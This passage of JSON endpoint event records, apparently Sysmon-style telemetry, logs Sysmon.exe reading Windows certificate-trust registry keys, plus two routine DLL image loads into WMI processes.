"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573480890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7720, - "process_name": "WmiApSrv.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", - "timestamp": 131883573481050000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clusapi.dll", - "image_path": "C:\\Windows\\System32\\clusapi.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573479790000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573481509984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 